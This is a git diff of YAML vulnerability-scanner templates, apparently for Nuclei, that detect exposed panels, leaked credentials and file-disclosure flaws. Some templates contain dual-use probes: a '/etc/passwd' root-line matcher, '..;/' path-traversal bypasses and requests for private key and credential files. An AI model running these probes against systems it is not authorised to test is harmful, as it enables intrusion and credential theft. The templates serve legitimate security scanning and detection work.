+ regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" diff --git a/poc/elk/elasticsearch-sql-client-detect.yaml b/poc/elk/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/elk/elasticsearch-sql-client-detect.yaml +++ b/poc/elk/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - 'Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 diff --git a/poc/elk/exposed-kibana.yaml b/poc/elk/exposed-kibana.yaml index a6bd3e4c5d..3acfdaecd4 100644 --- a/poc/elk/exposed-kibana.yaml +++ b/poc/elk/exposed-kibana.yaml @@ -1,18 +1,14 @@ id: exposed-kibana - info: name: Exposed Kibana author: Shine severity: medium - + tags: kibana,unauth requests: - method: GET path: - - '{{BaseURL}}/' - - '{{BaseURL}}:5601/' + - '{{BaseURL}}' - '{{BaseURL}}/app/kibana/' - - '{{BaseURL}}:5601/app/kibana/' - matchers-condition: and matchers: - type: word @@ -23,4 +19,4 @@ requests: - 'kibanaWelcomeTitle' - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/elk/kibana-panel.yaml b/poc/elk/kibana-panel.yaml index 80fdbfbdf9..f2a9dce48c 100644 --- a/poc/elk/kibana-panel.yaml +++ b/poc/elk/kibana-panel.yaml @@ -1,5 +1,4 @@ id: kibana-panel - info: name: Kibana Panel Login author: petruknisme,daffainfo,c-sh0 @@ -7,14 +6,12 @@ info: metadata: shodan-query: http.title:"Kibana" tags: panel,kibana - requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/login" - "{{BaseURL}}/app/kibana" - stop-at-first-match: true redirects: true max-redirects: 2 @@ -27,7 +24,6 @@ requests: - "Elastic" - "Kibana Login" condition: or - - type: regex part: header regex: diff --git a/poc/exposed/adobe-connect-username-exposure.yaml b/poc/exposed/adobe-connect-username-exposure.yaml index 088b39ad5e..e47b4fe88b 100644 --- a/poc/exposed/adobe-connect-username-exposure.yaml +++ b/poc/exposed/adobe-connect-username-exposure.yaml @@ -1,26 +1,26 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - author: dhiyaneshDk - severity: low - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/exposed/ansible-tower-exposure.yaml b/poc/exposed/ansible-tower-exposure.yaml index 72789c4755..413cf6170f 100644 --- a/poc/exposed/ansible-tower-exposure.yaml +++ b/poc/exposed/ansible-tower-exposure.yaml @@ -2,9 +2,21 @@ id: ansible-tower-exposure info: name: Ansible Tower Exposure - author: pdteam + author: pdteam,idealphase severity: low - tags: panel + description: Ansible Tower was detected. Ansible Tower is a commercial offering that helps teams manage complex multi-tier deployments by adding control, knowledge, and delegation to Ansible-powered environments. + reference: + - https://docs.ansible.com/ansible-tower/3.8.4/html/administration/ + - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html + metadata: + google-query: intitle:"Ansible Tower" + shodan-query: title:"Ansible Tower" + tags: panel,ansible + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -15,5 +27,14 @@ requests: - type: word words: - "Ansible Tower" - - "ansible-main-menu" - condition: and \ No newline at end of file + - "ansible-bootstrap" + condition: or + + extractors: + - type: regex + group: 1 + part: body + regex: + - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' + +# Enhanced by mp on 2022/03/16 diff --git a/poc/exposed/appspec-yml-disclosure-529.yaml b/poc/exposed/appspec-yml-disclosure-529.yaml index 0366a46dac..5a8637d8a4 100644 --- a/poc/exposed/appspec-yml-disclosure-529.yaml +++ b/poc/exposed/appspec-yml-disclosure-529.yaml @@ -3,7 +3,8 @@ info: name: Appspec Yml Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json tags: exposure,config requests: - method: GET diff --git a/poc/exposed/beward-ipcamera-disclosure.yaml b/poc/exposed/beward-ipcamera-disclosure.yaml index 726caf87e3..13668d231c 100644 --- a/poc/exposed/beward-ipcamera-disclosure.yaml +++ b/poc/exposed/beward-ipcamera-disclosure.yaml @@ -1,11 +1,13 @@ id: beward-ipcamera-disclosure info: name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure - description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php author: geeknik severity: high - tags: beward,iot,camera,disclosure + description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. + reference: + - https://www.exploit-db.com/exploits/46320 + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php + tags: iot,camera,disclosure requests: - method: GET path: @@ -17,7 +19,6 @@ requests: - type: regex regex: - 'root:[x*]:0:0:' - condition: or - type: status status: - 200 diff --git a/poc/exposed/cisco-smi-exposure-970.yaml b/poc/exposed/cisco-smi-exposure-970.yaml index 212bbf0f1b..de1d9fa723 100644 --- a/poc/exposed/cisco-smi-exposure-970.yaml +++ b/poc/exposed/cisco-smi-exposure-970.yaml @@ -24,7 +24,7 @@ network: host: - "{{Hostname}}" - - "{{Hostname}}:4786" + - "{{Host}}:4786" matchers: - type: word diff --git a/poc/exposed/clockwork-dashboard-exposure-1012.yaml b/poc/exposed/clockwork-dashboard-exposure-1012.yaml index 3e10886ff7..9a606fda5e 100644 --- a/poc/exposed/clockwork-dashboard-exposure-1012.yaml +++ b/poc/exposed/clockwork-dashboard-exposure-1012.yaml @@ -1,30 +1,30 @@ -id: clockwork-dashboard-exposure - -info: - name: Clockwork Dashboard Exposure - author: dhiyaneshDk - severity: high - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json - tags: exposure,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/__clockwork/latest" - - matchers-condition: and - matchers: - - type: word - words: - - '"id":' - - '"version":' - - '"method":' - - '"url":' - - '"time":' - part: body - condition: and - - - type: word - words: - - "application/json" - part: header +id: clockwork-dashboard-exposure + +info: + name: Clockwork Dashboard Exposure + author: dhiyaneshDk + severity: high + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/clockwork-dashboard-exposure.json + tags: exposure,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/__clockwork/latest" + + matchers-condition: and + matchers: + - type: word + words: + - '"id":' + - '"version":' + - '"method":' + - '"url":' + - '"time":' + part: body + condition: and + + - type: word + words: + - "application/json" + part: header diff --git a/poc/exposed/commax-credentials-disclosure-1158.yaml b/poc/exposed/commax-credentials-disclosure-1158.yaml index 0064e4def0..ced35532d2 100644 --- a/poc/exposed/commax-credentials-disclosure-1158.yaml +++ b/poc/exposed/commax-credentials-disclosure-1158.yaml @@ -4,7 +4,8 @@ info: author: gy741 severity: critical description: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php tags: commax,exposure,camera,iot requests: - method: GET diff --git a/poc/exposed/comtrend-password-exposure.yaml b/poc/exposed/comtrend-password-exposure.yaml index 50cd590374..71928b694c 100644 --- a/poc/exposed/comtrend-password-exposure.yaml +++ b/poc/exposed/comtrend-password-exposure.yaml @@ -4,8 +4,7 @@ info: author: geeknik severity: high description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint. - reference: - - https://www.exploit-db.com/exploits/16275 + reference: https://www.exploit-db.com/exploits/16275 tags: router,exposure,iot,rce requests: - method: GET diff --git a/poc/exposed/couchdb-exposure-1239.yaml b/poc/exposed/couchdb-exposure-1239.yaml index 83e4c2e185..376f2370b6 100644 --- a/poc/exposed/couchdb-exposure-1239.yaml +++ b/poc/exposed/couchdb-exposure-1239.yaml @@ -3,13 +3,14 @@ info: name: couchdb exposure author: organiccrap severity: low - tags: panel,couchdb + tags: panel requests: - method: GET path: - '{{BaseURL}}/_all_dbs' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word diff --git a/poc/exposed/dockerfile-hidden-disclosure.yaml b/poc/exposed/dockerfile-hidden-disclosure.yaml index feb4a915f9..e62fc2fc5e 100644 --- a/poc/exposed/dockerfile-hidden-disclosure.yaml +++ b/poc/exposed/dockerfile-hidden-disclosure.yaml @@ -3,7 +3,8 @@ info: name: Dockerfile Hidden Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/dockerfile-hidden-disclosure.json tags: exposure,config requests: - method: GET diff --git a/poc/exposed/exposed-adb-7280.yaml b/poc/exposed/exposed-adb-7280.yaml index e0a43b6ba2..26f932d53d 100644 --- a/poc/exposed/exposed-adb-7280.yaml +++ b/poc/exposed/exposed-adb-7280.yaml @@ -1,22 +1,33 @@ id: expsoed-adb + info: name: Exposed Android Debug Bridge author: pdteam,pikpikcu severity: critical + description: An exposed Android debug bridge was discovered. + reference: + - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20 + - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ tags: network,adb,rce,android - reference: https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge + network: - inputs: - - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint + - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # Generated using https://github.com/projectdiscovery/network-fingerprint type: hex + - data: "686f73743a3a66656174757265733d7368656c6c5f76322c636d642c737461745f76322c6c735f76322c66697865645f707573685f6d6b6469722c617065782c6162622c66697865645f707573685f73796d6c696e6b5f74696d657374616d702c6162625f657865632c72656d6f756e745f7368656c6c2c747261636b5f6170702c73656e64726563765f76322c73656e64726563765f76325f62726f746c692c73656e64726563765f76325f6c7a342c73656e64726563765f76325f7a7374642c73656e64726563765f76325f6472795f72756e5f73656e642c6f70656e73637265656e5f6d646e73" type: hex + host: - "{{Hostname}}" - "{{Host}}:5555" + matchers: - type: word words: - "device" - "product" condition: and + +# Enhanced by mp on 2022/03/21 diff --git a/poc/exposed/exposed-alps-spring-7284.yaml b/poc/exposed/exposed-alps-spring-7284.yaml index abbac6f138..5391725778 100644 --- a/poc/exposed/exposed-alps-spring-7284.yaml +++ b/poc/exposed/exposed-alps-spring-7284.yaml @@ -1,23 +1,16 @@ id: exposed-alps-spring - info: name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS) author: dwisiswant0 severity: medium - description: Exposed Spring Data profile semantics is exposed. - reference: - - https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ - metadata: - max-request: 3 - tags: exposure,spring,files - -http: + tags: exposure + reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/ +requests: - method: GET path: - "{{BaseURL}}/profile" - "{{BaseURL}}/api/profile" - "{{BaseURL}}/alps/profile" - matchers-condition: and matchers: - type: word @@ -27,13 +20,10 @@ http: - "profile" condition: and part: body - - type: word words: - "application/hal+json" part: header - - type: status status: - 200 -# digest: 490a0046304402200703b103b73e6c9bfffc56b77551a83932ef1f4e983b9075e82b4a2128ffff800220240eb935da994b34aa984e070bd64175bee530216e73e19f9af3add0ee595d5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/exposed-kibana.yaml b/poc/exposed/exposed-kibana.yaml index a6bd3e4c5d..3acfdaecd4 100644 --- a/poc/exposed/exposed-kibana.yaml +++ b/poc/exposed/exposed-kibana.yaml @@ -1,18 +1,14 @@ id: exposed-kibana - info: name: Exposed Kibana author: Shine severity: medium - + tags: kibana,unauth requests: - method: GET path: - - '{{BaseURL}}/' - - '{{BaseURL}}:5601/' + - '{{BaseURL}}' - '{{BaseURL}}/app/kibana/' - - '{{BaseURL}}:5601/app/kibana/' - matchers-condition: and matchers: - type: word @@ -23,4 +19,4 @@ requests: - 'kibanaWelcomeTitle' - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/exposed/exposed-nomad-7327.yaml b/poc/exposed/exposed-nomad-7327.yaml index db9e2d8a15..bd1a5a7f1c 100644 --- a/poc/exposed/exposed-nomad-7327.yaml +++ b/poc/exposed/exposed-nomad-7327.yaml @@ -1,33 +1,38 @@ -id: exposed-nomad -info: - name: Nomad - Exposed Jobs - author: pdteam - severity: medium - description: Nomad jobs were discovered. - reference: - - https://www.nomadproject.io/docs/internals/security - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - tags: nomad,devops,hashicorp,panel -requests: - - method: GET - path: - - "{{BaseURL}}/ui/jobs" - matchers-condition: and - matchers: - - type: word - words: - - "Nomad" - - "nomad-ui" - condition: and - - type: word - words: - - "text/html" - part: header - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 +id: exposed-nomad + +info: + name: Nomad - Exposed Jobs + author: pdteam + severity: medium + description: Nomad jobs were discovered. + reference: + - https://www.nomadproject.io/docs/internals/security + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + tags: nomad,devops,hashicorp,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/ui/jobs" + + matchers-condition: and + matchers: + - type: word + words: + - "Nomad" + - "nomad-ui" + condition: and + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/exposed/exposed-redis-7337.yaml b/poc/exposed/exposed-redis-7337.yaml index 166260adf7..825d612ae0 100644 --- a/poc/exposed/exposed-redis-7337.yaml +++ b/poc/exposed/exposed-redis-7337.yaml @@ -4,13 +4,13 @@ info: author: pdteam severity: high reference: https://redis.io/topics/security - tags: network,redis,unauth + tags: network,redis network: - inputs: - data: "info\r\nquit\r\n" host: - "{{Hostname}}" - - "{{Host}}:6379" + - "{{Hostname}}:6379" read-size: 2048 matchers-condition: and matchers: diff --git a/poc/exposed/exposed-sqlite-manager-7350.yaml b/poc/exposed/exposed-sqlite-manager-7350.yaml index a76ba9d93d..cff80e3ad5 100644 --- a/poc/exposed/exposed-sqlite-manager-7350.yaml +++ b/poc/exposed/exposed-sqlite-manager-7350.yaml @@ -1,18 +1,15 @@ id: exposed-sqlite-manager - info: name: SQLiteManager author: dhiyaneshDK severity: medium reference: https://www.exploit-db.com/ghdb/5003 tags: sqlite - requests: - method: GET path: - '{{BaseURL}}/sqlite/' - '{{BaseURL}}/sqlitemanager/' - matchers-condition: and matchers: - type: word diff --git a/poc/exposed/exposed-svn-7352.yaml b/poc/exposed/exposed-svn-7352.yaml index a3c7354eac..9e8aed327a 100644 --- a/poc/exposed/exposed-svn-7352.yaml +++ b/poc/exposed/exposed-svn-7352.yaml @@ -1,23 +1,28 @@ id: exposed-svn + info: name: Exposed SVN Directory - author: udit_thakkur & dwisiswant0 + author: udit_thakkur,dwisiswant0 severity: medium tags: config,exposure,svn + requests: - method: GET path: - "{{BaseURL}}/.svn/entries" + matchers-condition: and matchers: - type: regex part: body regex: - "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))" + - type: status status: - 200 + - type: word part: header words: - - "text/plain" + - "text/plain" \ No newline at end of file diff --git a/poc/exposed/exposed-swagger.yaml b/poc/exposed/exposed-swagger.yaml index 4700911c23..9ba88813fb 100644 --- a/poc/exposed/exposed-swagger.yaml +++ b/poc/exposed/exposed-swagger.yaml @@ -13,73 +13,19 @@ info: requests: - method: GET path: - - "{{BaseURL}}/swagger/" - - "{{BaseURL}}/swagger/index.html" - - "{{BaseURL}}/swagger-ui/index.html" - - "{{BaseURL}}/swagger-ui.html" - - "{{BaseURL}}/api/" - - "{{BaseURL}}/api/docs" - - "{{BaseURL}}/api-doc" - - "{{BaseURL}}/api-docs" - - "{{BaseURL}}/docs/index.html" - - "{{BaseURL}}/docs/" - - "{{BaseURL}}/docs/swagger-ui.html" - - "{{BaseURL}}/api/swagger-ui.html" - - "{{BaseURL}}/swagger/ui/index.html" - - "{{BaseURL}}/swagger/ui/index" - - "{{BaseURL}}/api/swagger/index.html" - - "{{BaseURL}}/api/swagger/ui/index" - - "{{BaseURL}}/api/swagger-ui/index.html" - - "{{BaseURL}}/api/docs/index.html" - - "{{BaseURL}}/api/doc/index.html" - - "{{BaseURL}}/api/index.html" - - "{{BaseURL}}/api/v1/swagger/index.html" - - "{{BaseURL}}/api/v1/swagger-ui/index.html" - - "{{BaseURL}}/api/v1/swagger/ui/index" - - "{{BaseURL}}/api/v1/docs/index.html" - - "{{BaseURL}}/api/v1/docs/swagger-ui/index.html" - - "{{BaseURL}}/api/v1/docs/swagger/index.html" - - "{{BaseURL}}/api/v2/swagger/index.html" - - "{{BaseURL}}/api/v2/docs/swagger-ui/index.html" - - "{{BaseURL}}/api/v2/docs/swagger/index.html" - - "{{BaseURL}}/api/v2/swagger-ui/index.html" - - "{{BaseURL}}/api/v2/swagger/ui/index" - - "{{BaseURL}}/api/v2/docs/index.html" - - "{{BaseURL}}/api/v3/swagger/index.html" - - "{{BaseURL}}/api/v3/swagger-ui/index.html" - - "{{BaseURL}}/api/v3/docs/swagger-ui/index.html" - - "{{BaseURL}}/api/v3/docs/swagger/index.html" - - "{{BaseURL}}/api/v3/swagger/ui/index" - - "{{BaseURL}}/api/v3/docs/index.html" - - "{{BaseURL}}/docs/swagger-ui/index.html" - - "{{BaseURL}}/v1/swagger/index.html" - - "{{BaseURL}}/v1/api" - - "{{BaseURL}}/v1/swagger-ui/index.html" - - "{{BaseURL}}/v1/swagger/ui/index" - - "{{BaseURL}}/v1/docs/index.html" - - "{{BaseURL}}/v1/api-docs/index.html" - - "{{BaseURL}}/v2/swagger/index.html" - - "{{BaseURL}}/v2/api" - - "{{BaseURL}}/v2/api-docs/index.html" - - "{{BaseURL}}/v2/swagger-ui/index.html" - - "{{BaseURL}}/v2/swagger/ui/index" - - "{{BaseURL}}/v2/docs/index.html" - - "{{BaseURL}}/v3/swagger/index.html" - - "{{BaseURL}}/v3/api-docs/index.html" - - "{{BaseURL}}/v3/swagger-ui/index.html" - - "{{BaseURL}}/v3/api" - - "{{BaseURL}}/v3/swagger/ui/index" - - "{{BaseURL}}/v3/docs/index.html" - - "{{BaseURL}}/" - - "{{BaseURL}}/doc/" - - "{{BaseURL}}/v0/" - - "{{BaseURL}}/v1/" - - "{{BaseURL}}/v2/" - - "{{BaseURL}}/v3/" - - "{{BaseURL}}/api/schema/swagger-ui/" - + - "{{BaseURL}}/swagger/..;/swagger/index.html" + - "{{BaseURL}}/swagger-ui/..;/swagger-ui/index.html" + - "{{BaseURL}}/api/..;/api/" + - "{{BaseURL}}/api/..;/api/docs/" + - "{{BaseURL}}/api-doc/..;/api-doc" + - "{{BaseURL}}/api-docs/..;/api-docs" + - "{{BaseURL}}/docs/..;/docs/index.html" + - "{{BaseURL}}/api/..;/api/swagger-ui.html" + - "{{BaseURL}}/swagger/..;/swagger/ui/index" + - "{{BaseURL}}/api/..;/api/swagger/index.html" + - "{{BaseURL}}/v1/..;/v1/" matchers: - type: word words: - - "Swagger UI" + - "swagger-ui-" diff --git a/poc/exposed/ftp-credentials-exposure.yaml b/poc/exposed/ftp-credentials-exposure.yaml index a0650c5bb3..2144e34389 100644 --- a/poc/exposed/ftp-credentials-exposure.yaml +++ b/poc/exposed/ftp-credentials-exposure.yaml @@ -1,13 +1,16 @@ id: ftp-credentials-exposure + info: name: FTP credentials exposure author: pikpikcu severity: medium tags: config,ftp,exposure + requests: - method: GET path: - "{{BaseURL}}/ftpsync.settings" + matchers-condition: and matchers: - type: word @@ -17,6 +20,7 @@ requests: - default_folder_permissions part: body condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/exposed/gogs-install-exposure.yaml b/poc/exposed/gogs-install-exposure.yaml index a41ff33671..bf05d82b66 100644 --- a/poc/exposed/gogs-install-exposure.yaml +++ b/poc/exposed/gogs-install-exposure.yaml @@ -1,6 +1,6 @@ id: gogs-install-exposure info: - name: Gogs install exposure + name: Gogs (Go Git Service) - Install Exposure author: dhiyaneshDk severity: high tags: gogs,exposure diff --git a/poc/exposed/iceflow-vpn-disclosure.yaml b/poc/exposed/iceflow-vpn-disclosure.yaml index eb974cd7f4..28d2389e90 100644 --- a/poc/exposed/iceflow-vpn-disclosure.yaml +++ b/poc/exposed/iceflow-vpn-disclosure.yaml @@ -3,8 +3,8 @@ id: iceflow-vpn-disclosure info: name: ICEFlow VPN Disclosure author: pikpikcu - severity: medium - tags: exposure,files + severity: low + tags: exposure,files,iceflow,logs requests: - method: GET @@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/log/mobile.log" - "{{BaseURL}}/log/firewall.log" + max-size: 2048 matchers-condition: and matchers: - type: word @@ -26,7 +27,15 @@ requests: - 'ICEFLOW SYSTEM' - 'ICEFLOW' part: body + condition: or - type: status status: - 200 + + - type: word + words: + - "text/plain" + - "ICEFLOW" + part: header + condition: and diff --git a/poc/exposed/iis-internal-ip-disclosure.yaml b/poc/exposed/iis-internal-ip-disclosure.yaml index 22f69af785..100c18eaf3 100644 --- a/poc/exposed/iis-internal-ip-disclosure.yaml +++ b/poc/exposed/iis-internal-ip-disclosure.yaml @@ -1,36 +1,33 @@ id: iis-internal-ip-disclosure + info: name: IIS Internal IP Disclosure Template author: WillD96 severity: info - reference: - - https://support.kemptechnologies.com/hc/en-us/articles/203522429-How-to-Mitigate-Against-Internal-IP-Address-Domain-Name-Disclosure-In-Real-Server-Redirect tags: iis,misconfig,disclosure + reference: https://support.kemptechnologies.com/hc/en-us/articles/203522429-How-to-Mitigate-Against-Internal-IP-Address-Domain-Name-Disclosure-In-Real-Server-Redirect + requests: - raw: - - |+ - GET / HTTP/1.0 - Accept: */* - - |+ GET / HTTP/1.0 Host: Accept: */* - stop-at-first-match: true unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. matchers-condition: and matchers: - type: regex - part: location + part: header regex: - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - type: status status: - - 301 - 302 + extractors: - type: regex - part: location + part: header regex: - - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' + - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' \ No newline at end of file diff --git a/poc/exposed/kyan-network-credentials-disclosure.yaml b/poc/exposed/kyan-network-credentials-disclosure.yaml index c44c1fd9d0..3cdc3b982d 100644 --- a/poc/exposed/kyan-network-credentials-disclosure.yaml +++ b/poc/exposed/kyan-network-credentials-disclosure.yaml @@ -1,5 +1,4 @@ id: kyan-network-credential-exposure - info: name: Kyan network monitoring device account and password exposure author: pikpikcu @@ -7,26 +6,21 @@ info: reference: | - https://mp.weixin.qq.com/s/6phWjDrGG0pCpGuCdLusIg tags: kyan,exposure,config - requests: - method: GET path: - "{{BaseURL}}/hosts" - matchers-condition: and matchers: - - type: word words: - "UserName=" - "Password=" condition: and - - type: word words: - "text/plain" part: header - - type: status status: - 200 diff --git a/poc/exposed/lvmeng-uts-disclosure.yaml b/poc/exposed/lvmeng-uts-disclosure.yaml index 698c818a0b..a419728c3a 100644 --- a/poc/exposed/lvmeng-uts-disclosure.yaml +++ b/poc/exposed/lvmeng-uts-disclosure.yaml @@ -1,15 +1,19 @@ id: lvmeng-uts-disclosure + info: - name: Lvmeng UTS Disclosure + name: Lvmeng - UTS Disclosure author: pikpikcu severity: high + description: Lvmeng UTS was discovered. tags: config,exposure + requests: - method: GET path: - "{{BaseURL}}/webapi/v1/system/accountmanage/account" headers: Content-Type: application/json + matchers-condition: and matchers: - type: status @@ -27,3 +31,5 @@ requests: - "MANAGER_IP" condition: and part: body + +# Enhanced by mp on 2022/07/15 diff --git a/poc/exposed/monitorix-exposure.yaml b/poc/exposed/monitorix-exposure.yaml index 8c0b91fe08..4c32dc5743 100644 --- a/poc/exposed/monitorix-exposure.yaml +++ b/poc/exposed/monitorix-exposure.yaml @@ -5,7 +5,7 @@ info: description: Monitorix is a free, open source, lightweight system monitoring tool designed to monitor as many services and system resources as possible. reference: https://www.monitorix.org/ severity: low - tags: monitorix,exposure,logs,panel + tags: monitorix,exposure,logs requests: - method: GET diff --git a/poc/exposed/prometheus-exposed-panel-9684.yaml b/poc/exposed/prometheus-exposed-panel-9684.yaml index 371360dff8..a3d9d7d5d1 100644 --- a/poc/exposed/prometheus-exposed-panel-9684.yaml +++ b/poc/exposed/prometheus-exposed-panel-9684.yaml @@ -3,14 +3,12 @@ info: name: Prometheus.io exposed panel author: organiccrap severity: low - # usually runs on port http/9090 + tags: panel,prometheus requests: - method: GET path: - '{{BaseURL}}/graph' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - - Prometheus Time Series Collection and Processing Server + - 'Prometheus Time Series Collection and Processing Server' diff --git a/poc/exposed/putty-private-key-disclosure-9730.yaml b/poc/exposed/putty-private-key-disclosure-9730.yaml index bd198242b3..bdb1c932e8 100644 --- a/poc/exposed/putty-private-key-disclosure-9730.yaml +++ b/poc/exposed/putty-private-key-disclosure-9730.yaml @@ -1,42 +1,22 @@ id: putty-private-key-disclosure - info: name: Putty Private Key Disclosure - author: DhiyaneshDk,geeknik + author: dhiyaneshDk severity: medium - description: Putty internal user key file is exposed. - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json - metadata: - verified: true - max-request: 8 - github-query: filename:putty.ppk + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json tags: exposure,files - -http: +requests: - method: GET path: - "{{BaseURL}}/my.ppk" - - "{{BaseURL}}/putty.ppk" - - "{{BaseURL}}/{{Hostname}}.ppk" - - "{{BaseURL}}/.ssh/putty.ppk" - - "{{BaseURL}}/.ssh/{{Hostname}}.ppk" - - "{{BaseURL}}/.putty/my.ppk" - - "{{BaseURL}}/.putty/putty.ppk" - - "{{BaseURL}}/.putty/{{Hostname}}.ppk" - - stop-at-first-match: true - matchers-condition: and matchers: - type: word - part: body words: - "PuTTY-User-Key-File" - "Encryption:" + part: body condition: and - - type: status status: - 200 -# digest: 